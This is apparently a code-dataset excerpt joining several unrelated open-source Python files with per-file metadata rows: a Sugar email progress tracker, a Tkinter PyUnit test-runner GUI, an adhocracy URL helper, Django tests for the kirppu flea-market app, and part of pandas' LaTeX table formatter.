obs_path = stationary._get_obs_path(write=False)
except text.MissingFolderError:
stationary.write_text()
obs_path = stationary._get_obs_path(write=False)
obsname = os.path.basename(obs_path)
bname += obsname + '_'
bname += stationary.region.name + ext
fname = os.path.join(obs_path, bname)
fig.savefig(fname, bbox_inches='tight', pad_inches=0)
if verbose:
print('Figure saved as {}'.format(fname))
return fig
| mit | -8,386,384,393,471,840,000 | 37.286184 | 111 | 0.570725 | false | 3.65317 | false | false | false |
FOSSRIT/sweetermail | tracker.py | 1 | 4542 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import email
import email.utils
import gtk
from gettext import gettext as _
from sugar.graphics.icon import Icon
from sugar.graphics import alert
from tags import FLAGS, HARDCODED
def ugly_hack(self, papa, pspec, value):
if pspec.name=='msg':
if self._msg != value:
self._msg = value
self._msg_label.set_markup(self._msg)
else:
papa.do_set_property(self, pspec, value)
class ProgressAlert(alert.Alert):
def __init__(self, *args, **kwds):
alert.Alert.__init__(self, *args, **kwds)
icon = Icon(icon_name='emblem-busy')
self.props.icon = icon
icon.show()
do_set_property = lambda self, pspec, value: ugly_hack(self, alert.Alert, pspec, value)
class ErrorAlert(alert.NotifyAlert):
def __init__(self, *args, **kwds):
alert.NotifyAlert.__init__(self, *args, **kwds)
icon = Icon(icon_name='emblem-notification')
self.props.icon = icon
icon.show()
do_set_property = lambda self, pspec, value: ugly_hack(self, alert.NotifyAlert, pspec, value)
class ProgressTracker(object):
def __init__(self, activity, title):
self._activity = activity
self._title = title
self._alert = ProgressAlert()
self._alert.props.title = title
#self._activity.add_alert(self._alert)
def _remove_alert(self, *args):
gtk.gdk.threads_enter()
self._activity.remove_alert(self._alert)
gtk.gdk.threads_leave()
def done(self):
self._remove_alert()
def update(self, msg):
gtk.gdk.threads_enter()
self._alert.props.msg = msg
gtk.gdk.threads_leave()
def error(self, msg, remove_old=True):
if remove_old: self._remove_alert()
gtk.gdk.threads_enter()
notify(self._activity, self._title, msg)
gtk.gdk.threads_leave()
class InboundTracker(ProgressTracker):
def __init__(self, activity):
ProgressTracker.__init__(self, activity, _('Checking email'))
def dump_msg(self, msg_str):
# TODO setting of FLAGS{'has_attachment'], filtering(!)
msg = email.message_from_string(msg_str)
ms = self._activity.ms
key = ms.add_msg(msg)
#if add_msg thinks it's a duplicate, don't associate it
if key == -1:
pass
# gmail sent emails hack
'''
if email.utils.parseaddr(msg['From'])[1]==self._activity.config.transport_account._from_addr:
ms.flag(key, FLAGS['sent'])
else:
ms.associate(HARDCODED['inbox'], key)
'''
ms.associate(HARDCODED['inbox'], key)
class OutboundTracker(ProgressTracker):
def __init__(self, activity):
ProgressTracker.__init__(self, activity, _('Sending email'))
def _add_and_flag(self, msg, flag):
ms = self._activity.ms
key = ms.add_msg(msg)
ms.flag(key, flag)
def try_later(self, msgs):
for msg in msgs:
self._add_and_flag(msg, FLAGS['outbound'])
def error_delivering(self, msg):
self._add_and_flag(msg, FLAGS['draft'])
ProgressTracker.error(self, _('Error delivering <i>%s</i>, message saved as draft.' % msg['Subject']), remove_old=False)
def some_rcpts_failed(self, msg, who):
msg['To'] = '; '.join(who)
self._add_and_flag(msg, FLAGS['draft'])
ProgressTracker.error(self, _('Error delivering <i></i> to %s; saved as draft.' % ', '.join(who)), remove_old=False)
def sent(self, msg):
self._add_and_flag(msg, FLAGS['sent'])
def notify(activity, title, msg, timeout=5):
alert = ErrorAlert(timeout)
alert.props.title = title
alert.props.msg = msg
activity.add_alert(alert)
alert.connect('response', lambda x,y: activity.remove_alert(alert))
| gpl-3.0 | -5,689,568,841,829,974,000 | 32.895522 | 128 | 0.624395 | false | 3.686688 | false | false | false |
Fat-Zer/FreeCAD_sf_master | src/Mod/Test/unittestgui.py | 12 | 15996 | #!/usr/bin/env python
"""
GUI framework and application for use with Python unit testing framework.
Execute tests written using the framework provided by the 'unittest' module.
Further information is available in the bundled documentation, and from
http://pyunit.sourceforge.net/
Copyright (c) 1999, 2000, 2001 Steve Purcell
This module is free software, and you may redistribute it and/or modify
it under the same terms as Python itself, so long as this copyright message
and disclaimer are retained in their original form.
IN NO EVENT SHALL THE AUTHOR BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT,
SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OF
THIS CODE, EVEN IF THE AUTHOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
DAMAGE.
THE AUTHOR SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE. THE CODE PROVIDED HEREUNDER IS ON AN "AS IS" BASIS,
AND THERE IS NO OBLIGATION WHATSOEVER TO PROVIDE MAINTENANCE,
SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
"""
__author__ = "Steve Purcell ([email protected])"
__version__ = "$Revision: 2.0 $"[11:-2]
import unittest
import sys
import Tkinter
import tkMessageBox
import traceback
import string
tk = Tkinter # Alternative to the messy 'from Tkinter import *' often seen
##############################################################################
# GUI framework classes
##############################################################################
class BaseGUITestRunner:
"""Subclass this class to create a GUI TestRunner that uses a specific
windowing toolkit. The class takes care of running tests in the correct
manner, and making callbacks to the derived class to obtain information
or signal that events have occurred.
"""
def __init__(self, *args, **kwargs):
self.currentResult = None
self.running = 0
self.__rollbackImporter = None
self.initGUI(*args, **kwargs)
def getSelectedTestName(self):
"Override to return the name of the test selected to be run"
pass
def errorDialog(self, title, message):
"Override to display an error arising from GUI usage"
pass
def runClicked(self):
"To be called in response to user choosing to run a test"
if self.running: return
testName = self.getSelectedTestName()
if not testName:
self.errorDialog("Test name entry", "You must enter a test name")
return
if self.__rollbackImporter:
self.__rollbackImporter.rollbackImports()
self.__rollbackImporter = RollbackImporter()
try:
test = unittest.defaultTestLoader.loadTestsFromName(testName)
except Exception:
exc_type, exc_value, exc_tb = sys.exc_info()
traceback.print_exception(*sys.exc_info())
self.errorDialog("Unable to run test '%s'" % testName,
"Error loading specified test: %s, %s" % \
(exc_type, exc_value))
return
self.currentResult = GUITestResult(self)
self.totalTests = test.countTestCases()
self.running = 1
self.notifyRunning()
test.run(self.currentResult)
self.running = 0
self.notifyStopped()
def stopClicked(self):
"To be called in response to user stopping the running of a test"
if self.currentResult:
self.currentResult.stop()
# Required callbacks
def notifyRunning(self):
"Override to set GUI in 'running' mode, enabling 'stop' button etc."
pass
def notifyStopped(self):
"Override to set GUI in 'stopped' mode, enabling 'run' button etc."
pass
def notifyTestFailed(self, test, err):
"Override to indicate that a test has just failed"
pass
def notifyTestErrored(self, test, err):
"Override to indicate that a test has just errored"
pass
def notifyTestStarted(self, test):
"Override to indicate that a test is about to run"
pass
def notifyTestFinished(self, test):
"""Override to indicate that a test has finished (it may already have
failed or errored)"""
pass
class GUITestResult(unittest.TestResult):
"""A TestResult that makes callbacks to its associated GUI TestRunner.
Used by BaseGUITestRunner. Need not be created directly.
"""
def __init__(self, callback):
unittest.TestResult.__init__(self)
self.callback = callback
def addError(self, test, err):
unittest.TestResult.addError(self, test, err)
self.callback.notifyTestErrored(test, err)
def addFailure(self, test, err):
unittest.TestResult.addFailure(self, test, err)
self.callback.notifyTestFailed(test, err)
def stopTest(self, test):
unittest.TestResult.stopTest(self, test)
self.callback.notifyTestFinished(test)
def startTest(self, test):
unittest.TestResult.startTest(self, test)
self.callback.notifyTestStarted(test)
class RollbackImporter:
"""This tricky little class is used to make sure that modules under test
will be reloaded the next time they are imported.
"""
def __init__(self):
self.previousModules = sys.modules.copy()
def rollbackImports(self):
for modname in sys.modules.keys():
if modname not in self.previousModules:
# Force reload when modname next imported
del(sys.modules[modname])
##############################################################################
# Tkinter GUI
##############################################################################
_ABOUT_TEXT="""\
PyUnit unit testing framework.
For more information, visit
http://pyunit.sourceforge.net/
Copyright (c) 2000 Steve Purcell
<[email protected]>
"""
_HELP_TEXT="""\
Enter the name of a callable object which, when called, will return a \
TestCase or TestSuite. Click 'start', and the test thus produced will be run.
Double click on an error in the listbox to see more information about it, \
including the stack trace.
For more information, visit
http://pyunit.sourceforge.net/
or see the bundled documentation
"""
class TkTestRunner(BaseGUITestRunner):
"""An implementation of BaseGUITestRunner using Tkinter.
"""
def initGUI(self, root, initialTestName):
"""Set up the GUI inside the given root window. The test name entry
field will be pre-filled with the given initialTestName.
"""
self.root = root
# Set up values that will be tied to widgets
self.suiteNameVar = tk.StringVar()
self.suiteNameVar.set(initialTestName)
self.statusVar = tk.StringVar()
self.statusVar.set("Idle")
self.runCountVar = tk.IntVar()
self.failCountVar = tk.IntVar()
self.errorCountVar = tk.IntVar()
self.remainingCountVar = tk.IntVar()
self.top = tk.Frame()
self.top.pack(fill=tk.BOTH, expand=1)
self.createWidgets()
def createWidgets(self):
"""Creates and packs the various widgets.
Why is it that GUI code always ends up looking a mess, despite all the
best intentions to keep it tidy? Answers on a postcard, please.
"""
# Status bar
statusFrame = tk.Frame(self.top, relief=tk.SUNKEN, borderwidth=2)
statusFrame.pack(anchor=tk.SW, fill=tk.X, side=tk.BOTTOM)
tk.Label(statusFrame, textvariable=self.statusVar).pack(side=tk.LEFT)
# Area to enter name of test to run
leftFrame = tk.Frame(self.top, borderwidth=3)
leftFrame.pack(fill=tk.BOTH, side=tk.LEFT, anchor=tk.NW, expand=1)
suiteNameFrame = tk.Frame(leftFrame, borderwidth=3)
suiteNameFrame.pack(fill=tk.X)
tk.Label(suiteNameFrame, text="Enter test name:").pack(side=tk.LEFT)
e = tk.Entry(suiteNameFrame, textvariable=self.suiteNameVar, width=25)
e.pack(side=tk.LEFT, fill=tk.X, expand=1)
e.focus_set()
e.bind('<Key-Return>', lambda e, self=self: self.runClicked())
# Progress bar
progressFrame = tk.Frame(leftFrame, relief=tk.GROOVE, borderwidth=2)
progressFrame.pack(fill=tk.X, expand=0, anchor=tk.NW)
tk.Label(progressFrame, text="Progress:").pack(anchor=tk.W)
self.progressBar = ProgressBar(progressFrame, relief=tk.SUNKEN,
borderwidth=2)
self.progressBar.pack(fill=tk.X, expand=1)
# Area with buttons to start/stop tests and quit
buttonFrame = tk.Frame(self.top, borderwidth=3)
buttonFrame.pack(side=tk.LEFT, anchor=tk.NW, fill=tk.Y)
self.stopGoButton = tk.Button(buttonFrame, text="Start",
command=self.runClicked)
self.stopGoButton.pack(fill=tk.X)
tk.Button(buttonFrame, text="Close",
command=self.top.quit).pack(side=tk.BOTTOM, fill=tk.X)
tk.Button(buttonFrame, text="About",
command=self.showAboutDialog).pack(side=tk.BOTTOM, fill=tk.X)
tk.Button(buttonFrame, text="Help",
command=self.showHelpDialog).pack(side=tk.BOTTOM, fill=tk.X)
# Area with labels reporting results
for label, var in (('Run:', self.runCountVar),
('Failures:', self.failCountVar),
('Errors:', self.errorCountVar),
('Remaining:', self.remainingCountVar)):
tk.Label(progressFrame, text=label).pack(side=tk.LEFT)
tk.Label(progressFrame, textvariable=var,
foreground="blue").pack(side=tk.LEFT, fill=tk.X,
expand=1, anchor=tk.W)
# List box showing errors and failures
tk.Label(leftFrame, text="Failures and errors:").pack(anchor=tk.W)
listFrame = tk.Frame(leftFrame, relief=tk.SUNKEN, borderwidth=2)
listFrame.pack(fill=tk.BOTH, anchor=tk.NW, expand=1)
self.errorListbox = tk.Listbox(listFrame, foreground='red',
selectmode=tk.SINGLE,
selectborderwidth=0)
self.errorListbox.pack(side=tk.LEFT, fill=tk.BOTH, expand=1,
anchor=tk.NW)
listScroll = tk.Scrollbar(listFrame, command=self.errorListbox.yview)
listScroll.pack(side=tk.LEFT, fill=tk.Y, anchor=tk.N)
self.errorListbox.bind("<Double-1>",
lambda e, self=self: self.showSelectedError())
self.errorListbox.configure(yscrollcommand=listScroll.set)
def getSelectedTestName(self):
return self.suiteNameVar.get()
def errorDialog(self, title, message):
tkMessageBox.showerror(parent=self.root, title=title,
message=message)
def notifyRunning(self):
self.runCountVar.set(0)
self.failCountVar.set(0)
self.errorCountVar.set(0)
self.remainingCountVar.set(self.totalTests)
self.errorInfo = []
while self.errorListbox.size():
self.errorListbox.delete(0)
#Stopping seems not to work, so simply disable the start button
#self.stopGoButton.config(command=self.stopClicked, text="Stop")
self.stopGoButton.config(state=tk.DISABLED)
self.progressBar.setProgressFraction(0.0)
self.top.update_idletasks()
def notifyStopped(self):
self.stopGoButton.config(state=tk.ACTIVE)
#self.stopGoButton.config(command=self.runClicked, text="Start")
self.statusVar.set("Idle")
def notifyTestStarted(self, test):
self.statusVar.set(str(test))
self.top.update_idletasks()
def notifyTestFailed(self, test, err):
self.failCountVar.set(1 + self.failCountVar.get())
self.errorListbox.insert(tk.END, "Failure: %s" % test)
self.errorInfo.append((test,err))
def notifyTestErrored(self, test, err):
self.errorCountVar.set(1 + self.errorCountVar.get())
self.errorListbox.insert(tk.END, "Error: %s" % test)
self.errorInfo.append((test,err))
def notifyTestFinished(self, test):
self.remainingCountVar.set(self.remainingCountVar.get() - 1)
self.runCountVar.set(1 + self.runCountVar.get())
fractionDone = float(self.runCountVar.get())/float(self.totalTests)
fillColor = len(self.errorInfo) and "red" or "green"
self.progressBar.setProgressFraction(fractionDone, fillColor)
def showAboutDialog(self):
tkMessageBox.showinfo(parent=self.root, title="About PyUnit",
message=_ABOUT_TEXT)
def showHelpDialog(self):
tkMessageBox.showinfo(parent=self.root, title="PyUnit help",
message=_HELP_TEXT)
def showSelectedError(self):
selection = self.errorListbox.curselection()
if not selection: return
selected = int(selection[0])
txt = self.errorListbox.get(selected)
window = tk.Toplevel(self.root)
window.title(txt)
window.protocol('WM_DELETE_WINDOW', window.quit)
test, error = self.errorInfo[selected]
tk.Label(window, text=str(test),
foreground="red", justify=tk.LEFT).pack(anchor=tk.W)
tracebackLines = traceback.format_exception(*error + (10,))
tracebackText = string.join(tracebackLines,'')
tk.Label(window, text=tracebackText, justify=tk.LEFT).pack()
tk.Button(window, text="Close",
command=window.quit).pack(side=tk.BOTTOM)
window.bind('<Key-Return>', lambda e, w=window: w.quit())
window.mainloop()
window.destroy()
class ProgressBar(tk.Frame):
"""A simple progress bar that shows a percentage progress in
the given colour."""
def __init__(self, *args, **kwargs):
tk.Frame.__init__(*(self,) + args, **kwargs)
self.canvas = tk.Canvas(self, height='20', width='60',
background='white', borderwidth=3)
self.canvas.pack(fill=tk.X, expand=1)
self.rect = self.text = None
self.canvas.bind('<Configure>', self.paint)
self.setProgressFraction(0.0)
def setProgressFraction(self, fraction, color='blue'):
self.fraction = fraction
self.color = color
self.paint()
self.canvas.update_idletasks()
def paint(self, *args):
totalWidth = self.canvas.winfo_width()
width = int(self.fraction * float(totalWidth))
height = self.canvas.winfo_height()
if self.rect is not None: self.canvas.delete(self.rect)
if self.text is not None: self.canvas.delete(self.text)
self.rect = self.canvas.create_rectangle(0, 0, width, height,
fill=self.color)
percentString = "%3.0f%%" % (100.0 * self.fraction)
self.text = self.canvas.create_text(totalWidth/2, height/2,
anchor=tk.CENTER,
text=percentString)
def main(initialTestName=""):
root = tk.Tk()
root.title("PyUnit")
runner = TkTestRunner(root, initialTestName)
root.protocol('WM_DELETE_WINDOW', root.quit)
root.mainloop()
if __name__ == '__main__':
import sys
if len(sys.argv) == 2:
main(sys.argv[1])
else:
main()
| lgpl-2.1 | 3,964,741,910,127,345,000 | 38.090226 | 79 | 0.606339 | false | 4.038374 | true | false | false |
SysTheron/adhocracy | src/adhocracy/lib/helpers/selection_helper.py | 5 | 1162 | from pylons.i18n import _
from adhocracy.lib import cache
from adhocracy.lib.helpers import proposal_helper as proposal
from adhocracy.lib.helpers import url as _url
@cache.memoize('selection_url')
def url(selection, member=None, format='html', selection_page=False, **kwargs):
if member is None and format == 'html' and not selection_page:
anchor = "selection_%s" % selection.id
return proposal.url(selection.proposal, anchor=anchor)
url = proposal.url(selection.proposal, member='implementation')
url += "/" + str(selection.id)
return _url.append_member_and_format(url, member=member, format=format,
**kwargs)
@cache.memoize('selection_bc')
def bc_entity(selection):
bc = _url.link(_("Implementation"),
proposal.url(selection.proposal,
member=u'/implementation'))
bc += _url.BREAD_SEP + _url.link(selection.page.title, url(selection))
return bc
def breadcrumbs(selection):
bc = _url.root()
if selection is not None:
bc = bc_entity(selection)
else:
bc += _("Implementation")
return bc
| agpl-3.0 | 8,183,553,078,062,723,000 | 32.2 | 79 | 0.638554 | false | 3.809836 | false | false | false |
jlaunonen/kirppu | kirppu/tests/test_states.py | 1 | 8423 | # -*- coding: utf-8 -*-
from http import HTTPStatus
from django.test import Client, TestCase
import faker
from .factories import *
from .api_access import Api
from . import ResultMixin
from ..models import Item, Receipt, ReceiptItem
__author__ = 'codez'
class PublicTest(TestCase, ResultMixin):
def setUp(self):
self.client = Client()
self.event = EventFactory()
self.vendor = VendorFactory(event=self.event)
self.type = ItemTypeFactory(event=self.event)
user = self.vendor.user
if not self.client.login(username=user.username, password=UserFactory.DEFAULT_PASSWORD):
raise RuntimeError("Could not log in.")
def test_register_item(self):
data = dict(
name=faker.Faker().sentence(nb_words=3),
price="1.25",
tag_type="short",
suffixes="",
item_type=self.type.id,
adult=False,
)
result = self.assertSuccess(self.client.post("/kirppu/{}/vendor/item/".format(self.event.slug),
data=data)).json()
self.assertEqual(1, len(result))
r_item = result[0]
self.assertEqual(self.vendor.id, r_item["vendor_id"])
def test_register_box(self):
data = dict(
description=faker.Faker().sentence(nb_words=3),
price="1.25",
item_type=self.type.id,
adult=False,
count=4,
bundle_size=1,
)
# Returns actually an html-page.. Test within context.
result = self.assertSuccess(self.client.post("/kirppu/{}/vendor/box/".format(self.event.slug), data=data))
self.assertEqual(data["description"], result.context["description"])
def test_register_box_with_single_item(self):
data = dict(
description=faker.Faker().sentence(nb_words=3),
price="1.25",
item_type=self.type.id,
adult=False,
count=1,
bundle_size=1,
)
# Returns actually an html-page.. Test within context.
result = self.assertSuccess(self.client.post("/kirppu/{}/vendor/box/".format(self.event.slug), data=data))
self.assertEqual(data["description"], result.context["description"])
def test_register_single_bundle_box(self):
data = dict(
description=faker.Faker().sentence(nb_words=3),
price="1.25",
item_type=self.type.id,
adult=False,
count=1,
bundle_size=2,
)
# Returns actually an html-page.. Test within context.
result = self.assertSuccess(self.client.post("/kirppu/{}/vendor/box/".format(self.event.slug), data=data))
self.assertEqual(data["description"], result.context["description"])
class StatesTest(TestCase, ResultMixin):
def setUp(self):
self.client = Client()
self.event = EventFactory()
self.vendor = VendorFactory(event=self.event)
self.items = ItemFactory.create_batch(10, vendor=self.vendor)
self.counter = CounterFactory(event=self.event)
self.clerk = ClerkFactory(event=self.event)
self.api = Api(client=self.client, event=self.event)
self.assertSuccess(self.api.clerk_login(code=self.clerk.get_code(), counter=self.counter.private_key))
def test_fail_reserve_without_receipt(self):
ret = self.api.item_reserve(code=self.items[0].code)
self.assertEqual(HTTPStatus.BAD_REQUEST, ret.status_code)
def test_normal_item_receipt(self):
item_code = self.items[0].code
receipt = self.assertSuccess(self.api.receipt_start()).json()
self.assertSuccess(self.api.item_reserve(code=item_code))
db_item = Item.objects.get(code=item_code)
self.assertEqual(Item.STAGED, db_item.state)
finished_receipt = self.assertSuccess(self.api.receipt_finish(id=receipt["id"])).json()
db_item = Item.objects.get(code=item_code)
self.assertEqual(Item.SOLD, db_item.state)
self.assertEqual(Receipt.FINISHED, finished_receipt["status"])
def test_double_reservation(self):
# Note: This tests only two subsequent requests.
# Two simultaneous requests cannot be tested here as basic tests require sequential request/database access.
item_code = self.items[0].code
receipt = self.assertSuccess(self.api.receipt_start()).json()
self.assertSuccess(self.api.item_reserve(code=item_code))
expected_failure = self.api.item_reserve(code=item_code)
self.assertEqual(HTTPStatus.LOCKED, expected_failure.status_code)
def test_normal_box_receipt(self):
box = BoxFactory(adopt=True, items=self.items)
box_checkin = self.assertResult(self.api.item_checkin(code=box.representative_item.code),
expect=HTTPStatus.ACCEPTED).json()
self.assertSuccess(self.api.box_checkin(code=box.representative_item.code,
box_info=box_checkin["box"]["box_number"]))
receipt = self.assertSuccess(self.api.receipt_start()).json()
reserve_count = 3
self.assertSuccess(self.api.box_item_reserve(box_number=box.box_number, box_item_count=reserve_count))
self.assertEqual(reserve_count, Item.objects.filter(box=box, state=Item.STAGED).count())
finished_receipt = self.assertSuccess(self.api.receipt_finish(id=receipt["id"])).json()
self.assertEqual(Receipt.FINISHED, finished_receipt["status"])
def test_box_over_reserve(self):
reserve_count = 3
box = BoxFactory(vendor=VendorFactory(event=self.event), item_count=reserve_count - 1)
box_checkin = self.assertResult(self.api.item_checkin(code=box.representative_item.code),
expect=HTTPStatus.ACCEPTED).json()
self.assertSuccess(self.api.box_checkin(code=box.representative_item.code,
box_info=box_checkin["box"]["box_number"]))
receipt = self.assertSuccess(self.api.receipt_start()).json()
self.assertResult(self.api.box_item_reserve(box_number=box.box_number, box_item_count=reserve_count),
expect=HTTPStatus.CONFLICT)
def test_box_return_receipt(self):
"""Reserving and releasing box items should avoid representative item,
as it is the one used to display item price.
Relevant when part of box items are sold, and price of rest of its items are changed."""
box = BoxFactory(adopt=True, items=self.items, box_number=1)
Item.objects.all().update(state=Item.BROUGHT)
representative_item_id = box.representative_item_id
receipt = self.assertSuccess(self.api.receipt_start()).json()
def check_count(n):
self.assertEqual(n, Item.objects.filter(state=Item.STAGED).count())
self.assertEqual(n, ReceiptItem.objects.filter(receipt__pk=receipt["id"], action=ReceiptItem.ADD).count())
self.assertSuccess(self.api.box_item_reserve(box_number=1, box_item_count=4))
self.assertEqual(4, Item.objects.filter(state=Item.STAGED).count())
# Representative item should not be added to the receipt first.
self.assertEqual(Item.BROUGHT, Item.objects.get(pk=representative_item_id).state)
self.assertSuccess(self.api.box_item_release(box_number=1, box_item_count=2))
self.assertEqual(2, Item.objects.filter(state=Item.STAGED).count())
# Representative item should be first to be released.
self.assertSuccess(self.api.box_item_reserve(box_number=1, box_item_count=8))
check_count(10)
self.assertEqual(Item.STAGED, Item.objects.get(pk=representative_item_id).state)
self.assertSuccess(self.api.box_item_release(box_number=1, box_item_count=1))
check_count(9)
self.assertEqual(Item.BROUGHT, Item.objects.get(pk=representative_item_id).state)
self.assertSuccess(self.api.box_item_reserve(box_number=1, box_item_count=1))
check_count(10)
self.assertEqual(Item.STAGED, Item.objects.get(pk=representative_item_id).state)
self.assertSuccess(self.api.box_item_release(box_number=1, box_item_count=2))
check_count(8)
self.assertEqual(Item.BROUGHT, Item.objects.get(pk=representative_item_id).state)
| mit | 145,492,830,655,224,130 | 42.417526 | 118 | 0.642052 | false | 3.663767 | true | false | false |
gfyoung/pandas | pandas/io/formats/latex.py | 2 | 25201 | """
Module for formatting output data in Latex.
"""
from abc import ABC, abstractmethod
from typing import Iterator, List, Optional, Sequence, Tuple, Type, Union
import numpy as np
from pandas.core.dtypes.generic import ABCMultiIndex
from pandas.io.formats.format import DataFrameFormatter
def _split_into_full_short_caption(
caption: Optional[Union[str, Tuple[str, str]]]
) -> Tuple[str, str]:
"""Extract full and short captions from caption string/tuple.
Parameters
----------
caption : str or tuple, optional
Either table caption string or tuple (full_caption, short_caption).
If string is provided, then it is treated as table full caption,
while short_caption is considered an empty string.
Returns
-------
full_caption, short_caption : tuple
Tuple of full_caption, short_caption strings.
"""
if caption:
if isinstance(caption, str):
full_caption = caption
short_caption = ""
else:
try:
full_caption, short_caption = caption
except ValueError as err:
msg = "caption must be either a string or a tuple of two strings"
raise ValueError(msg) from err
else:
full_caption = ""
short_caption = ""
return full_caption, short_caption
class RowStringConverter(ABC):
r"""Converter for dataframe rows into LaTeX strings.
Parameters
----------
formatter : `DataFrameFormatter`
Instance of `DataFrameFormatter`.
multicolumn: bool, optional
Whether to use \multicolumn macro.
multicolumn_format: str, optional
Multicolumn format.
multirow: bool, optional
Whether to use \multirow macro.
"""
def __init__(
self,
formatter: DataFrameFormatter,
multicolumn: bool = False,
multicolumn_format: Optional[str] = None,
multirow: bool = False,
):
self.fmt = formatter
self.frame = self.fmt.frame
self.multicolumn = multicolumn
self.multicolumn_format = multicolumn_format
self.multirow = multirow
self.clinebuf: List[List[int]] = []
self.strcols = self._get_strcols()
self.strrows = list(zip(*self.strcols))
def get_strrow(self, row_num: int) -> str:
"""Get string representation of the row."""
row = self.strrows[row_num]
is_multicol = (
row_num < self.column_levels and self.fmt.header and self.multicolumn
)
is_multirow = (
row_num >= self.header_levels
and self.fmt.index
and self.multirow
and self.index_levels > 1
)
is_cline_maybe_required = is_multirow and row_num < len(self.strrows) - 1
crow = self._preprocess_row(row)
if is_multicol:
crow = self._format_multicolumn(crow)
if is_multirow:
crow = self._format_multirow(crow, row_num)
lst = []
lst.append(" & ".join(crow))
lst.append(" \\\\")
if is_cline_maybe_required:
cline = self._compose_cline(row_num, len(self.strcols))
lst.append(cline)
return "".join(lst)
@property
def _header_row_num(self) -> int:
"""Number of rows in header."""
return self.header_levels if self.fmt.header else 0
@property
def index_levels(self) -> int:
"""Integer number of levels in index."""
return self.frame.index.nlevels
@property
def column_levels(self) -> int:
return self.frame.columns.nlevels
@property
def header_levels(self) -> int:
nlevels = self.column_levels
if self.fmt.has_index_names and self.fmt.show_index_names:
nlevels += 1
return nlevels
def _get_strcols(self) -> List[List[str]]:
"""String representation of the columns."""
if self.fmt.frame.empty:
strcols = [[self._empty_info_line]]
else:
strcols = self.fmt.get_strcols()
# reestablish the MultiIndex that has been joined by get_strcols()
if self.fmt.index and isinstance(self.frame.index, ABCMultiIndex):
out = self.frame.index.format(
adjoin=False,
sparsify=self.fmt.sparsify,
names=self.fmt.has_index_names,
na_rep=self.fmt.na_rep,
)
# index.format will sparsify repeated entries with empty strings
# so pad these with some empty space
def pad_empties(x):
for pad in reversed(x):
if pad:
break
return [x[0]] + [i if i else " " * len(pad) for i in x[1:]]
gen = (pad_empties(i) for i in out)
# Add empty spaces for each column level
clevels = self.frame.columns.nlevels
out = [[" " * len(i[-1])] * clevels + i for i in gen]
# Add the column names to the last index column
cnames = self.frame.columns.names
if any(cnames):
new_names = [i if i else "{}" for i in cnames]
out[self.frame.index.nlevels - 1][:clevels] = new_names
# Get rid of old multiindex column and add new ones
strcols = out + strcols[1:]
return strcols
@property
def _empty_info_line(self):
return (
f"Empty {type(self.frame).__name__}\n"
f"Columns: {self.frame.columns}\n"
f"Index: {self.frame.index}"
)
def _preprocess_row(self, row: Sequence[str]) -> List[str]:
"""Preprocess elements of the row."""
if self.fmt.escape:
crow = _escape_symbols(row)
else:
crow = [x if x else "{}" for x in row]
if self.fmt.bold_rows and self.fmt.index:
crow = _convert_to_bold(crow, self.index_levels)
return crow
def _format_multicolumn(self, row: List[str]) -> List[str]:
r"""
Combine columns belonging to a group to a single multicolumn entry
according to self.multicolumn_format
e.g.:
a & & & b & c &
will become
\multicolumn{3}{l}{a} & b & \multicolumn{2}{l}{c}
"""
row2 = row[: self.index_levels]
ncol = 1
coltext = ""
def append_col():
# write multicolumn if needed
if ncol > 1:
row2.append(
f"\\multicolumn{{{ncol:d}}}{{{self.multicolumn_format}}}"
f"{{{coltext.strip()}}}"
)
# don't modify where not needed
else:
row2.append(coltext)
for c in row[self.index_levels :]:
# if next col has text, write the previous
if c.strip():
if coltext:
append_col()
coltext = c
ncol = 1
# if not, add it to the previous multicolumn
else:
ncol += 1
# write last column name
if coltext:
append_col()
return row2
def _format_multirow(self, row: List[str], i: int) -> List[str]:
r"""
Check following rows, whether row should be a multirow
e.g.: becomes:
a & 0 & \multirow{2}{*}{a} & 0 &
& 1 & & 1 &
b & 0 & \cline{1-2}
b & 0 &
"""
for j in range(self.index_levels):
if row[j].strip():
nrow = 1
for r in self.strrows[i + 1 :]:
if not r[j].strip():
nrow += 1
else:
break
if nrow > 1:
# overwrite non-multirow entry
row[j] = f"\\multirow{{{nrow:d}}}{{*}}{{{row[j].strip()}}}"
# save when to end the current block with \cline
self.clinebuf.append([i + nrow - 1, j + 1])
return row
def _compose_cline(self, i: int, icol: int) -> str:
"""
Create clines after multirow-blocks are finished.
"""
lst = []
for cl in self.clinebuf:
if cl[0] == i:
lst.append(f"\n\\cline{{{cl[1]:d}-{icol:d}}}")
# remove entries that have been written to buffer
self.clinebuf = [x for x in self.clinebuf if x[0] != i]
return "".join(lst)
class RowStringIterator(RowStringConverter):
"""Iterator over rows of the header or the body of the table."""
@abstractmethod
def __iter__(self) -> Iterator[str]:
"""Iterate over LaTeX string representations of rows."""
class RowHeaderIterator(RowStringIterator):
"""Iterator for the table header rows."""
def __iter__(self) -> Iterator[str]:
for row_num in range(len(self.strrows)):
if row_num < self._header_row_num:
yield self.get_strrow(row_num)
class RowBodyIterator(RowStringIterator):
"""Iterator for the table body rows."""
def __iter__(self) -> Iterator[str]:
for row_num in range(len(self.strrows)):
if row_num >= self._header_row_num:
yield self.get_strrow(row_num)
class TableBuilderAbstract(ABC):
"""
Abstract table builder producing string representation of LaTeX table.
Parameters
----------
formatter : `DataFrameFormatter`
Instance of `DataFrameFormatter`.
column_format: str, optional
Column format, for example, 'rcl' for three columns.
multicolumn: bool, optional
Use multicolumn to enhance MultiIndex columns.
multicolumn_format: str, optional
The alignment for multicolumns, similar to column_format.
multirow: bool, optional
Use multirow to enhance MultiIndex rows.
caption: str, optional
Table caption.
short_caption: str, optional
Table short caption.
label: str, optional
LaTeX label.
position: str, optional
Float placement specifier, for example, 'htb'.
"""
